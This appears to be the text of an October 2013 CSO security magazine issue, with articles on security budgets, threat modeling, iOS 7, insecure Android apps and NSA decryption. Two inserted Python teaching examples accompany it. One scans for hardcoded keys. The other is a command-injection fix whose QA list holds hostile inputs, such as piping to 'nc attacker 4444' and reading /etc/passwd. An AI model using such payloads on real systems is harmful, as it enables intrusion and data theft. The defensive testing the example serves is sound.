More Money, Same Problems

My youngest child recently started kindergarten. This new beginning also ended a monthly ritual I’ve performed for more than 8 years, since the birth of my first child: writing out a check for thousands of dollars to our local day care.

As a full-time working mother, the cost of weekly childcare is just part of the dues you pay for choosing to have a career. But as any working parent will tell you, the fees are not for the weak of heart.

As the day care tuition was about to come to an end, I envisioned everything my family would be able to do with this monthly windfall.

In other words, I thought I was about to get a huge raise simply because my daughter was getting older.

Boy, was I wrong.

What I neglected to consider is that as children get older, they require other costly expenses every year: activities, sports, uniforms, clubs, electronics, unexpected school fees that seem to crop up out of nowhere. Before I had even had a chance to make plans for our newfound money, it had already been earmarked for other purposes.

This mirrors what we’re witnessing now in security. As you’ll see in this issue, our 11th annual Global Information Security Survey, conducted by PricewaterhouseCoopers and CSO magazine, finds that most security executives are running up against cost issues, too, even as their budgets grow. Much like the day-care-to-kindergarten raise that never came my way, security departments are getting raises, too, that are quickly getting eaten up by other costs that arise as they struggle to mitigate the constant flow of threats thrown at them yearly.

As contributor George V. Hulme outlines in our feature story, while organizations have increased IT security spending, the number of attacks they’re enduring, and the cost of those attacks, is rising.

Sure, budgets increased 51 percent compared to 2012, according to our respondents. This is good news because it means security is finally getting the attention and respect it deserves in organizations. But the number of incidents detected also rose 25 percent since 2012. Add that fact to the growing list of new technologies that security professionals need to understand and master each year, and it’s no wonder that security continues to feel pinched, even with more resources.

So as I reach for my checkbook to make a payment for yet another childhood necessity, I’d like to ask you: Is there ever enough money in your budget to cover security costs? Or are you always playing catch-up, too?

-Joan Goodchild, Editor,
jgoodchild@cxo.com


CSO (ISSN 1540-904X) is published monthly except for a combined issue in July/August and December/January by CXO Media Inc., 492 Old Connecticut Path, P.O. Box 9208, Framingham, MA 01701-9208. Periodical Postage Rate at Framingham, MA 01701, and at additional mailing offices. Canadian Publications Mail agreement number 1902075. Canadian Postmaster: Please return undeliverable copy to P.O. Box 1632, Windsor, ON N9A 7C9. Copyright 2011 by CXO Media Inc. All rights reserved. Reproduction of material appearing in CSO is forbidden without written permission. Permission to photocopy for internal or personal use or the internal or personal use of specific clients is granted by CSO for users through the Copyright Clearance Center, provided that a fee of $3.50 per copy of the article is paid directly to Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01970, www.copyright.com. Please specify: ISSN 1540-904X. Permission to photocopy does not extend to contributed articles followed by this symbol. Address inquiries to CSO, P.O. Box 3482, Northbrook, IL 60065; 866 354-1125. CSO is free to qualified security executives. To all others the one-year basic rate is $70 for the United States and Canada, $95 to foreign countries (payable in U.S. funds only). The single copy price is $9 to the U.S. and Canada and $15 international. Please allow four to six weeks for new subscriptions to begin. Change of Address: Go to www.omeda.com/custsrv/cso and follow the online instructions. Postmaster: Send change of address to CSO, P.O. Box 3482, Northbrook, IL 60065. Printed in the USA.


2 www.csoonline.com OCTOBER 2013


Contributors: Taylor Armerding, David Geer, Antone Gonsalves, George V. Hulme, Jeremy Kirk, John P. Mello Jr., Lauren Gibbons Paul, Bob Violino





The Eternal Game of Catchup

You’re not doing security well. Don’t get me wrong, you’re doing a good job at what you’re trying to do, but you’re trying to do the wrong things, and for the most part it’s not your fault.

Information security has been evolving into enterprise risk management, which takes into account the business impact, and that includes more than just IT risk. But businesses are being forced to spend money on compliance efforts that do not make them more secure; that’s just a fact. Take compliance away, and businesses would spend their money very, very differently.

In addition to compliance, businesses are throwing their money at technologies like cloud, but they rarely quantify the risks their businesses face and how they are mitigating those risks.

At the same time, the bad guys are improving their game. Security teams are always putting out fires and you’re finding yourself one or more steps behind your adversaries. I don’t need to spell out the evolution to you, but as a refresher:

Script kiddies begat organized crime, which was followed by nation states part one (I call this “part one” because they were just trying to steal our intellectual property back then).

Then along came the hacktivists like Anonymous, which left organizations walking on their tiptoes through a field of land mines, never sure whether their next step would tick off someone or some organization that would then blow them up.

In the past two years, we encountered nation states part two (this time they’re looking to take down our financial systems, or at least shut off the lights).

And as always, there is the insider threat, as the NSA learned with Edward Snowden.

How can you get ahead of your foes, or is that impossible because they only have to be right once and you have to be right every time?

So I ask: If we’re taking all these risks and spending all this money to mitigate those risks, then why aren’t things getting any better? I’d like to hear your thoughts on this challenge and what can be done to address it.

Next month I’ll explore part two of this issue: technologies and collaboration.

-Bob Bragdon, Publisher
bbragdon@cxo.com
Using Threat Modeling to Elevate InfoSec’s Strategic Role

By Jason Clark and Tom August

Information security programs are vital to the success of any organization, yet our executive teams frequently don’t recognize their strategic value. That’s often because we security professionals don’t understand the overall goals of the business and align our programs to support them.

We’ve found threat modeling to be an effective remedy. Simply defined, threat modeling is an exercise that describes the security stance of an organization or system in terms of specific threats or attacks that, if successful, could result in harm. It’s a powerful tool for improving how our teams engage with our leadership and repositioning us as business-critical colleagues.

The following steps explain how to implement threat modeling. We use a hospital as an example, but the steps are applicable anywhere.

Ask executives to identify the top business threats. Then investigate whether existing defenses can prevent these threats from happening. For example, a hospital faces the threat of disruptions to electronic medical record (EMR) systems that could significantly impact patient care.

Identify the people, process or technology gaps that could allow these business threats to happen. These might include ineffective governance, insufficient security awareness, or poorly configured or maintained technologies. In our hospital scenario, there might be sufficient redundancy for backup in a system outage, but IT staff might lack adequate documentation to quickly re-establish access to the EMR system, putting patients at risk.

Identify the attacks that could exploit these gaps. By identifying potential attacks, your team can then identify any existing controls that protect against them and determine any remaining risk items; these can then be prioritized according to likelihood and impact. A lack of security awareness among hospital staff might result in a social engineering attack that identifies VIPs receiving medical treatment and sells that information to the media or posts it online.

Illustrate what a potential attack would look like. These attack types can then be prioritized based on likelihood and impact. A social engineering attack against a hospital might include: a physical attack against external-facing employees, such as front office staff and security guards; a telephone attack against executive administrative assistants, call centers or help desks; and an email attack against the entire organization.

Walk through each potential attack. This is best performed with a variety of people from within the business and IT. The goal is to identify where existing controls break down and where additional action may be required.

Identify the appropriate response for each attack. These might include risk avoidance, risk mitigation, transference or risk acceptance. IT staff could perform risk mitigation against social engineering, for example, by increasing security awareness training.

Propose a risk management strategy. Make sure to clearly show the links between initiatives, budget items, threats and responses.

Share the strategy with leadership. Because leadership was engaged in the process, they can better understand how your plan can support their business objectives. (You should still avoid using buzzwords and “tech-speak” to keep things simple and clear.)

As you can see, threat modeling can do more than help define security programs and identify security gaps. It can help build trust between our departments and leadership by:

Showing greater understanding of business needs.

Highlighting how well existing processes and technologies address threats to the business.

Sharing the potential costs of addressing any remaining risk.
New iOS Makes iPhones Safer

Apple introduced several new features that appeal to security pros and enterprises. By John P. Mello, Jr.

Fingerprint reading isn’t the only sign that Apple is upping the ante in mobile security. Its new operating system is full of goodies that should boost its security appeal in the enterprise.

“Before iOS 7, Apple already had a secure operating system, with many options available to enterprises to lock them down,” says SilverSky CTO Andrew Jaquith. “Only the BlackBerry had more options. With iOS 7, companies will find many of their remaining needs addressed. It’s clear that Apple is listening to their enterprise customers.”

Following the security lead of BlackBerry, and Samsung with its Knox platform, Apple has added features to help segregate personal from professional information on a device.

“They are doing this with a few different features, including restricting company apps from talking to personal apps, as well as offering a per-app VPN, which can selectively route only enterprise traffic,” says Jonathan Dale, marketing director of Fiberlink.

“In my opinion, Apple appears to have significantly improved the controls which help separate work and personal information,” Dale says. “Users and companies should feel more secure that their data will not go to unintended places.”

The new iOS also has better support for mobile device management (MDM) systems. While before there was a lag between initializing a device on the network and enrolling it in an MDM, now the two tasks can be rolled into one for more efficient and easier operation.

“There will be more mobile security policies available to lock down devices,” SilverSky’s Jaquith says. “These include additional options for restricting Siri, AirDrop file sharing, and which apps can open particular files and attachments. Admins should be able to restrict documents in company email, for example, from being opened in DropBox.”

Apple has also enhanced containerization in the OS. Its managed open-in feature allows companies to designate which apps can open which files, which separates personal and corporate data so business content will be opened only in enterprise-approved apps.

The new iOS also adds a single sign-on feature, which allows a device to communicate with the back end of a system without each of its apps generating usernames and passwords for themselves. “It makes things much easier for the end user,” says PJ Gupta, CEO of Amtel.

Senthil Krishnapillai, head of mobile security for SAP, says, “It tremendously improves the usability of the application and, combined with fingerprint reading, it gives you true two-factor authentication.”

With the new iOS, Apple is also giving administrators the power to reuse app licenses. In previous systems, when an app was issued to an employee, its license stayed with that employee, not with the company. Now that license can be recovered by the organization. “There was no way to reclaim the license,” Fiberlink’s Dale says. “It was a big deal because it was a big pain.”

Gupta noted that Apple has also modified the application lock feature in the new iOS. Before, if a phone was lost or stolen, whoever recovered the handset might not have been able to get past the application lock to access the phone’s data, but they could do a system reset and use the phone as their own.

That can’t be done with iOS 7. If the application lock is activated, a system reset won’t allow the phone to be reused. “It becomes a brick,” Gupta says.

With its new security features, iOS is keeping pace with security stalwart BlackBerry and Samsung’s new Knox security platform. “With the introduction of Knox, Apple has had to play catchup with Samsung in the enterprise market,” Gupta says.

However, SAP’s Krishnapillai says that because of the way the Android ecosystem works, Apple has a leg up on Samsung. Knox is limited to a specific model of Samsung phone. “Developers writing for Knox have to make an app for Knox and one for the rest of the Android market,” Krishnapillai says. “App developers for iOS only have to write for iOS.”

John P. Mello, Jr. is a freelance writer and frequent contributor to CSO.
On Android, Even Major Brands’ Apps Are Not Secure

In a study on mobile apps and their level of security, RIIS, a firm that specializes in mobile app development, says some of the nation’s top brands, including airlines, retail outlets, entertainment companies, and insurance companies, are producing Android apps that place users and their personal information at risk.

RIIS tested 20 Android apps to determine how many of OWASP’s top 10 simple security flaws they included. Only four apps displayed none of the top 10 flaws. The other 16 apps all had at least one flaw.

Many of the apps tested are consumer-focused, including those from Wal-Mart, Delta, Facebook, Geico, Ticketmaster and Speedway, which means they can show up on anyone’s network.

Delta’s and Geico’s apps were the worst offenders, guilty of such security sins as insecure data storage, poor authorization and authentication, broken cryptography and disclosing sensitive information.

On the other side of that coin, the four apps that didn’t include any of OWASP’s top 10 errors were those put out by Wells Fargo, Chase, State Farm, and the IRS.

Godfrey Nolan, the lead researcher in the study, says that Delta’s app stores the user’s password in an encrypted SQLite database, and “the key is in the APK, which can be reverse engineered back into source code using some simple tools available on the Internet.”

“It is common practice (and a fundamental security flaw) to store the username and password encrypted in a SQLite database or shared preferences folder with a hardcoded encryption key which can be found by decompiling the APK,” the report says.

Geico and Ticketmaster both offered apps that exposed login information, and LiveNation’s tool doesn’t use any encryption, storing the login details in clear text.

Many of the developers RIIS spoke to reacted negatively, Nolan says, which may imply that they were not concerned about the issues the study had uncovered and were willing to trade security for usability.

Nolan’s advice is for security staff to apply mobile security scanning techniques to ensure the organization knows what apps are insecure before allowing them to be installed on any employee-owned or company devices.

-Steve Ragan
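As an added example (not code from the RIIS study or from any of the apps named above), the following Python check implements the kind of source-level scan Nolan recommends: it walks a constructed Java fragment shaped like decompiled Android code and flags the two patterns the report describes, a key literal reaching SecretKeySpec and a credential written to SQLite or SharedPreferences. The class and field names in the sample are hypothetical.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample in the shape of decompiled Android code (hypothetical, not any
# vendor's app): the AES key is a string constant compiled into the APK, the password
# is written to SQLite encrypted with that key, and also to SharedPreferences in clear.
SAMPLE_SOURCE = """\
public class LoginStore {
    private static final String AES_KEY = "0123456789abcdef";
    private static final byte[] IV = new byte[]{0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15};

    void save(Context ctx, SQLiteDatabase db, String user, String pwd) throws Exception {
        SecretKeySpec spec = new SecretKeySpec(AES_KEY.getBytes("UTF-8"), "AES");
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, spec, new IvParameterSpec(IV));
        ContentValues row = new ContentValues();
        row.put("username", user);
        row.put("password", Base64.encodeToString(c.doFinal(pwd.getBytes()), 0));
        db.insert("accounts", null, row);
        ctx.getSharedPreferences("login", 0).edit().putString("password", pwd).apply();
    }
}
"""


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


# A String or byte[] constant initialised from a literal: candidate key material.
LITERAL_CONST = re.compile(r'final\s+(?:String|byte\[\])\s+(\w+)\s*=\s*(?:"[^"]*"|new\s+byte\s*\[\]\s*\{)')
# Key material reaching SecretKeySpec: an inline literal/array (group 1) or a named constant (group 2).
KEYSPEC = re.compile(r'new\s+SecretKeySpec\s*\(\s*(?:("[^"]*"|new\s+byte\s*\[\])|(\w+))')
# A value persisted under a credential-looking name via ContentValues.put or putString.
CRED_STORE = re.compile(r'\.put(?:String)?\s*\(\s*"([^"]*(?:pass|pwd|secret)[^"]*)"\s*,\s*(.*)', re.I)
# The stored value is a bare variable, i.e. written exactly as received.
BARE_VALUE = re.compile(r'\w+\s*\)')


def scan(source: str) -> list[Finding]:
    """Pass 1 collects constants initialised from literals; pass 2 flags SecretKeySpec
    calls that consume them and credential writes to local storage."""
    lines = source.splitlines()
    literal_consts: dict[str, int] = {}
    for no, text in enumerate(lines, 1):
        m = LITERAL_CONST.search(text)
        if m:
            literal_consts[m.group(1)] = no

    findings: list[Finding] = []
    for no, text in enumerate(lines, 1):
        m = KEYSPEC.search(text)
        if m and m.group(1) is not None:
            findings.append(Finding(no, "hardcoded-key", "key literal passed to SecretKeySpec"))
        elif m and m.group(2) in literal_consts:
            const = m.group(2)
            findings.append(Finding(no, "hardcoded-key",
                                    f"key built from constant {const} (line {literal_consts[const]})"))
        m = CRED_STORE.search(text)
        if m:
            field, rest = m.group(1), m.group(2)
            if BARE_VALUE.match(rest):
                findings.append(Finding(no, "cleartext-credential", f"'{field}' stored unmodified"))
            else:
                findings.append(Finding(no, "stored-credential", f"'{field}' stored after transformation"))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Encrypting a stored credential buys nothing when the key ships in the same APK."""
    rules = {f.rule for f in findings}
    if "cleartext-credential" in rules:
        return "FAIL: credential stored in clear text"
    if "stored-credential" in rules and "hardcoded-key" in rules:
        return "FAIL: credential encrypted with a key that ships in the APK"
    if "stored-credential" in rules:
        return "REVIEW: credential persisted; check where the key lives"
    return "PASS: no credential persisted locally"


if __name__ == "__main__":
    for f in scan(SAMPLE_SOURCE):
        print(f"line {f.line}: {f.rule}: {f.detail}")
    print(verdict(scan(SAMPLE_SOURCE)))
```

The same two passes work on the output of an APK decompiler; a key that reaches SecretKeySpec from a method parameter (for example, one fetched from the platform keystore) produces no finding.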
NSA Cracked Your Encryption? Blame Yourself

By Tony Bradley, Bradley Strategy Group

The National Security Agency is making headlines once again thanks to new revelations from fugitive whistle-blower Edward Snowden. Snowden claims that efforts to encrypt communications are incapable of preventing access by the NSA, but at least one security expert maintains that this claim is probably exaggerated and that security pros may unwittingly play a significant role in allowing the NSA to break their encryptions.

According to a report from United Press International, “The [NSA], at a cost of more than $250 million in the current year’s budget, employs custom-built, superfast computers to break codes with ‘brute force,’ uses covert measures to ensure NSA control over setting international encryption standards and, in the most closely guarded secret, collaborates with technology companies and Internet service providers in the process, said the documents published by The New York Times, the nonprofit news organization ProPublica and a British newspaper, The Guardian.”

Is it possible? Yes. There is no such thing as absolutely impenetrable encryption. Given enough processing power and time, the NSA can just try every possible combination in existence until it hits the right one: a brute-force attack. An encryption algorithm based on a 256-bit key, however, has 1x10^77 possibilities. That’s a 10 with 77 zeros after it.

When you’re brute forcing, you could get lucky and hit it on the first try, or it could take you 1x10^77 attempts. I have no idea what you even call a number with 77 zeros, but suffice it to say it’s astronomically huge. I don’t care how powerful your computers are, it will take a long time to try out that many key combinations to find the right one.

Dave Anderson, a senior director with Voltage Security, agrees that the NSA’s capabilities may have been overstated. “To quote Snowden himself, ‘Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on.’”

Anderson suggests that the NSA’s ability to bypass encryption is almost certainly a function of flawed implementation or poor encryption-key management. “Is it possible that the NSA can decrypt financial and shopping accounts? Perhaps, but only if the cryptography that was used to protect the sensitive transactions was improperly implemented through faulty, incomplete or invalid key management processes or simple human error.”

When properly implemented, encryption provides essentially unbreakable security. It’s the sort of security that it would take implausibly powerful supercomputers millions of years to crack. But if it’s carelessly implemented, and the key-management processes are not sound, this security can be reduced to the level where a hacker with a mid-market PC can crack it in a few hours at most.

Regardless, these rumors underscore a massive problem with data security. Encryption is generally touted as the Holy Grail magic solution for all things data security, so many organizations and individuals just turn on whatever encryption is the easiest or most convenient and expect communications and data to be invulnerable. It’s an unrealistic expectation.

You can have the best, most formidable lock in the world securing the front door to your home, but if you hide the key under the welcome mat, it won’t stop an intruder. If the NSA is cracking all the encryption on the Internet, there’s a pretty good chance that a weakness in key management is making it possible, maybe even easy. It might be a weakness in how the keys are being generated or how they’re stored.

The key-management lifecycle typically relies in part on human intervention, which brings an element of human error into the equation as well.

Anderson summed up with, “General Robert Barrow once said that amateurs think about tactics while professionals think about logistics. An appropriate way to update this to the Internet age might be that amateurs talk about encryption while professionals talk about key management.”




Chrome Apps May Not Be Worth the Risk

Google’s launch of Chrome Apps, a new breed of browser-based software that will run on top of any operating system, has left skeptical security experts wondering whether Google is needlessly creating a new opening for cybercriminals.

Launched in early September, Chrome Apps is Google’s latest step toward embedding its many services in the operating systems of rivals Microsoft and Apple. The goal is to make apps running on Google’s platform appear to run natively on either Windows or Mac OS X.

Even though Chrome Apps require Google’s Chrome Web browser, the software can run outside the browser and offline. Documents, photos and video can be saved on a computer’s hard drive, as well as to Google’s cloud storage service, called Google Drive. Updates, including security patches, occur automatically.

Initially, Chrome Apps will run only on Windows and the Google Chromebook, an inexpensive netbook powered by Google’s Chrome OS. In the near future, Chrome Apps will also run on Mac OS X and Linux.

The strategy behind Chrome Apps is to merge the technology with the host OS so users do not notice a difference. This all-in-one approach aimed at improving the user experience increases the likelihood people will use Google services, which means the company can gather more data to sell to advertisers.

“We want Chrome Apps to be so good you don’t even realize it’s something different,” Rahul Roy-Chowdhury, project manager for Chrome Apps, told the technology website The Verge.

While the goal makes good business sense, security experts worry that Google is creating a layer of complexity that will introduce a new set of vulnerabilities for cybercriminals to exploit. Much of the concern is based on the huge security headache caused by other cross-platform technologies for running applications, such as Adobe Flash and Java, which was developed by Sun Microsystems. Sun was acquired by Oracle in 2009.

“Sun pioneered the ‘write once, infect everywhere’ model that Oracle has perpetuated,” says Randy Abrams, research director for security adviser NSS Labs.

Because Google gathers enormous amounts of user data, Chrome Apps are unlikely to be welcomed by companies, Abrams says. “There are serious concerns as to privacy and data leakage when it comes to Google,” he says. “Chrome Apps will be a huge concern for enterprises trying to protect intellectual property and other sensitive data, as well as a new security headache.”

Vulnerabilities are a given in all software, so it is important to look at the vendor’s track record for getting out patches quickly. While Google has often been criticized for making security blunders in Android, its mobile operating system, the company has incorporated strong security in the Chrome browser and in its Web services.

“They have been really impressive on the security side,” says Wolfgang Kandek, CTO for vulnerability-management company Qualys.

Nevertheless, Google will have to provide a compelling reason to risk the inevitable vulnerabilities introduced with its new application platform. Simply offering to run software similar to what is already available for Windows or Mac OS X is unlikely to lure many users, and is certainly not worth the risk.

“From a security point of view, [Chrome Apps] is something to keep your eye on, because hackers love to go after things that are new and interesting,” says Court Little, senior service architect for managed security provider Solutionary.

-Antone Gonsalves
Schneier Says NSA’s Encryption-Breaking Scheme Destroys the Fundamental Fabric of the Internet

THE NATIONAL SECURITY AGENCY’S efforts to defeat encrypted Internet communications are an attack on the security of the Internet and on users’ trust in the network, some security experts say.

The NSA and intelligence agencies in allied countries have found ways to circumvent much of the encryption used on the Internet, according to stories in The New York Times, ProPublica and the Guardian. The NSA, the British Government Communications Headquarters and other spy agencies have used a variety of means to defeat encryption, including supercomputers, court orders and behind-the-scenes agreements with tech companies, according to the reports.

The reports, relying on documents provided by former NSA contractor Edward Snowden, show that many tech companies are collaborating with the spy agencies to “destroy privacy,” says cryptographer and security specialist Bruce Schneier. “The fundamental fabric of the Internet has been destroyed.”

The new revelations should raise major concerns from Internet users over who they can trust, Schneier says. “I assume that all big companies are now in cahoots with the NSA, cannot be trusted, are lying to us constantly,” he says. “You cannot trust any company that makes any claims of the security of their products. Not one cloud provider, not one software provider, not one hardware manufacturer.”

It appears that the NSA is defeating encryption not by brute force but by “cheating”: attempting to build backdoors into systems and strong-arm companies into giving it information, Schneier says.

[Photo: General Keith Alexander, director of the National Security Agency, responds to questions at the Black Hat 2013 hacker convention.]

Digital rights group the Center for Democracy and Technology echoed some of Schneier’s concerns, with senior staff technologist Joseph Lorenzo Hall calling the NSA’s encryption circumvention efforts “a fundamental attack on the way the Internet works.”

The NSA has been working for years to build backdoor vulnerabilities into encryption standards and technology products, reports say. Hall criticized those efforts. “In an era in which businesses, as well as the average consumer, trust secure networks and technologies for sensitive transactions and private communications online, it’s incredibly destructive for the NSA to add flaws to such critical infrastructure,” he says. “The NSA seems to be operating on the fantastically naive assumption that any vulnerabilities it builds into core Internet technologies can only be exploited by itself and its global partners.”

The recent New York Times story, citing a Guardian report from July, says Microsoft has worked with the NSA to provide the agency with pre-encryption access to Outlook, Skype and other products. Microsoft has repeatedly denied helping the NSA break encryption on its products. A spokeswoman says the company complies with legal court orders for information on its customers and will provide agencies with unencrypted customer information if ordered by a court to do so.

Hall defends Microsoft’s approach. “It seems pretty clear that Microsoft is legally compelled to do this and would not otherwise do it voluntarily,” he says.

But Matthew Green, a cryptographer and research professor at Johns Hopkins University, says Microsoft deserves scrutiny on encryption security. Most commercial encryption uses a small number of libraries, with Microsoft CryptoAPI being among the most common, he wrote in a blog post.

“While Microsoft employs good (and paranoid!) people to vet their algorithms, their ecosystem is obviously deeply closed-source,” Green wrote. “You can view Microsoft's code (if you sign enough licensing agreements) but you’ll never build it yourself. Moreover they have the market share. If any commercial vendor is weakening encryption systems, Microsoft is probably the most likely suspect.”

Microsoft Internet Information Services runs on about 20 percent of the Web’s servers, and nearly 40 percent of the SSL servers, while third-party encryption programs running on Windows depend on Microsoft APIs, Green wrote. “That makes these programs somewhat dependent on Microsoft’s honesty.”

-Grant Gross
Three Habits of Effective Data Center Protection Teams

How good security teams keep up with evolving technology while ensuring everything runs smoothly BY EVELYN DE SOUZA

NOW THAT SUMMER’S OVER AND work is in full swing again, it’s time to reflect on how to move data center security forward to keep pace with new technology and workforce trends.

Habit 1: Embrace the need for real-time services and transactions.

Web 2.0 has taken over everything, and as a result, businesses and consumers alike have come to expect information and services to be delivered in real time. The challenge is for security teams to balance these demands for instant adaptation without placing company assets at risk. To achieve this, businesses must choose technologies that can scale as network architectures become faster, flatter and much more automated. Additionally, data center solutions must be able to address both private and public cloud adoption, as well as the convergence between security and networking teams that is currently underway at many companies.

The answer will be in adopting flexible toolsets and template-driven processes that map to team functions. Look for tools that allow policy to be abstracted from the network and applied across different topologies beyond the traditional enterprise perimeter. Enabling the network, server operations and security teams to work in tandem to provision services speedily will also be key.

Habit 2: Don’t let your security solutions negatively affect performance.

Does it ever seem like some data center teams treat security like the unwanted child? Historically, it’s been because security has either eroded performance and infrastructure efficiency gains, or because it required burdensome infrastructure retrofits.

To counteract this attitude, now is the time to evaluate the impact of your security toolsets on data-center performance. In a recent Cisco-sponsored Network World study, 73 percent of respondents did not feel confident that their current firewall or intrusion-prevention system could satisfy today’s increased performance requirements. So with this in mind, take this window of opportunity to adopt platforms that can help overcome this problem.

Select a platform that has been designed not only to ensure high throughput, but also to maximize availability and ensure optimal traffic flows. Use clustering and a pay-as-you-go model to maximize hardware investments.

Habit 3: Keep protection focused on what matters most: users and data.

Security teams remain in denial about cloud and mobility trends. The reality is that key parts of the infrastructure are increasingly out of security’s control. Therefore, it’s important to ensure a contextual approach: Focus on who, what, when and where so you can enable users to safely access data.

Also, as threats continue to evolve, consult cloud-based threat data to find much-needed supplemental information that will be essential to making accurate security decisions. Many teams find that cloud threat data helps provide a level of confidence in moving to cloud-based infrastructure models where they are likely to have a limited degree of visibility and control.

■ Evelyn de Souza is a data center and cloud security strategist for Cisco Systems.
Stop Hyping Threats and Start Creating Solutions

I RECENTLY CHAIRED A PANEL ON CYBERTHREATS FOR A local business council. I had great panelists giving details on sophisticated attacks found in their companies' threat reports, along with words from the National Institute of Standards and Technology on the security framework effort triggered by President Obama's executive order on cybersecurity. But when I opened it up for questions, most of the audience did not ask about the threats discussed, instead having reactions along the lines of, “OK, that’s nice, but what solutions have you seen that worked against these things, and how do we convince management they need to fund us to do something?”

The audience had a very CEO-like response. While the security community clings to the belief that management just doesn’t understand cyberthreats or risk, the reality is that most CEOs have been bombarded with apocalyptic cyberthreat reports from business publications and the mainstream media, and from their own security teams. Most really do weigh those risks, using the same formal or informal thinking they use to judge the risk of investing in a new product, or doing a merger or acquisition. The real leaps forward are not made by convincing management about threats or risk; they are made by showing them solutions to the problems that are less disruptive and less expensive than doing nothing.

Successful business leaders usually make their decisions based on their judgment about opportunity costs: If I spend the money here, how will that disrupt my business by depriving funding from some other area of business or investment?

That captures where we are today in security; we don’t need to keep flogging the threat, we need to be able to demonstrate solutions that work and that don’t disrupt the business. To a CEO, slowing down business so it hurts less when bad things happen is riskier than doing nothing. What security needs is less, “It hurts when we do this,” and more, “Instead of doing this, we are going to do that.”

A few examples of poor strategies:

■ BYOD solutions that propose back-to-the-mainframe approaches like making users deal with dumb terminal apps or completely locking down smartphones or tablets.

■ The government trying to force government employees to use Smart Cards (remember those?) for authentication on mobile devices.

■ Continuing to give users and admins full ability to load any executable, even though 99 percent of what they need can be found on widely available whitelists.

■ Allowing Web apps to continue to include command injection vulnerabilities even though 99 percent of them could be easily found and fixed during final QA.
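The last item above names a vulnerability class and a fix without showing either. The Python example below is added here by the editor and is not part of Pescatore's column or of any SANS material: it shows the command-injection shape that a final-QA pass can catch (user input pasted into a shell string), the hardened equivalent that validates the input against an allowlist pattern and passes arguments as a list so no shell ever parses them, and a small QA gate that feeds constructed hostile inputs to both. The `ls -l` command, the file-name pattern and the payload list are assumptions chosen for illustration, not anything taken from the page.

```python
import re
import subprocess

# Allowlist for a plain file name: letters, digits, dot, underscore, hyphen,
# no leading dot or hyphen, no path separators, no shell metacharacters.
# (Pattern chosen for this example.)
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")

# Inputs a QA tester would type into the form field. Constructed for this example.
QA_PAYLOADS = [
    "report.txt; id",                  # command chaining
    "report.txt && cat /etc/passwd",   # conditional chaining
    "report.txt | nc attacker 4444",   # pipe to a second program
    "$(whoami).txt",                   # command substitution
    "`whoami`.txt",                    # backtick substitution
    "../../etc/shadow",                # path traversal, same root cause
    "-R",                              # argument injection: parsed as an option
]


def vulnerable_command(user_file: str) -> str:
    """BEFORE: the user-controlled value is interpolated into a shell string.

    An application would run this with subprocess.run(cmd, shell=True), so
    everything after ';', '&&' or '|' becomes a second command. The string is
    returned rather than executed so this example never runs a payload.
    """
    return f"ls -l {user_file}"


def hardened_argv(user_file: str) -> list[str]:
    """AFTER: validate against the allowlist, then build an argument list.

    With shell=False the list is handed to execve() unchanged, so shell
    metacharacters are never interpreted. The '--' stops a name such as
    '-R' from being read as an option, and the regex rejects separators
    and substitution syntax before anything reaches the command.
    """
    if not SAFE_FILENAME.match(user_file):
        raise ValueError(f"rejected file name: {user_file!r}")
    return ["ls", "-l", "--", user_file]


def run_hardened(user_file: str) -> subprocess.CompletedProcess:
    """Execute the hardened form; an invalid name raises before anything runs."""
    return subprocess.run(hardened_argv(user_file), shell=False,
                          capture_output=True, text=True, check=False)


def qa_injection_check(payloads=QA_PAYLOADS) -> dict:
    """Final-QA gate: every payload must be rejected by the hardened builder.

    The report also records the exact string the vulnerable builder would have
    handed to a shell, which is what a reviewer shows the developer.
    """
    report = {"rejected": [], "leaked_to_shell": []}
    for payload in payloads:
        report["leaked_to_shell"].append(vulnerable_command(payload))
        try:
            hardened_argv(payload)
        except ValueError:
            report["rejected"].append(payload)
    return report


if __name__ == "__main__":
    result = qa_injection_check()
    print("hardened builder rejected all payloads:",
          len(result["rejected"]) == len(QA_PAYLOADS))
    for cmd in result["leaked_to_shell"]:
        print("vulnerable shell string:", cmd)
    print(run_hardened("report.txt").returncode)
```

The gate is deliberately cheap: it runs in seconds against a list of payloads and fails the build if a single one gets through the builder, which is the kind of check the column argues belongs in final QA rather than in a threat briefing.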

There are success stories out there, where CISOs led or supported the development of solutions that met demand to use personally owned devices without increasing risk, or decreased vulnerabilities in software, or quickly detected advanced targeted attacks in time to prevent them from affecting the business, all without requesting new funding or altering business processes. Those CISOs focused on change, on doing something differently and better to improve security without having to restrain business or try to make management understand the threat.

In my 13 years in security research, I’ve yet to see a risk-management or ROI argument that was the catalyst for leaps forward in security. Most leaps were made by security managers who didn’t need new funds to get started. They tried new approaches to intrusion prevention, pen testing, application security, BYOD and desktop security, replacing the old way with a new way to demonstrate it solved a problem. Then they easily got funding for full-scale roll-out.

I’ll leave you with my version of Aesop’s fable “The Ant and the Grasshopper”: The security ant was busy replacing old firewalls and intrusion-prevention systems with advanced threat detection, checking Web code for vulnerabilities before deploying and using whitelisting on all servers to prevent malware. The security grasshopper was busy singing the “Song o’ Threats” and creating risk dashboards that he was sure would make the board of directors finally get it, and laughed at the toiling ant, until the attack hit that stole all the wheat the grasshopper had planned to eat later. The ant’s firm survived the attack, made it through the winter and into a very prosperous spring. The grasshopper had to call in expensive incident response and public relations consultants, notify thousands of customers that their personal information had been exposed, and spent all spring staring at compliance reports.

Be an industrious security ant, not a singing security grasshopper.

John Pescatore is director of emerging security trends at SANS.
Risk

A Real-World Approach to Risk-Based Planning

IT CAN BE ALL TOO EASY TO DEPLOY security technology and think you’ve mitigated risk to your business, but sadly technology investment alone is no guarantee of protection against the latest threats.

A global study by the Ponemon Institute indicates that despite serious business investment in modern security equipment, there was still a 58 percent year-over-year increase in malware incidents last year, with the average cost of a cyberattack totaling a whopping $6.1 million. And according to a recent report by the Department for Business, Innovation and Skills in the U.K., 87 percent of small businesses and 93 percent of large organizations experienced at least some form of security breach in the past year, while the cost of cyber breaches against those businesses has tripled over that same year.

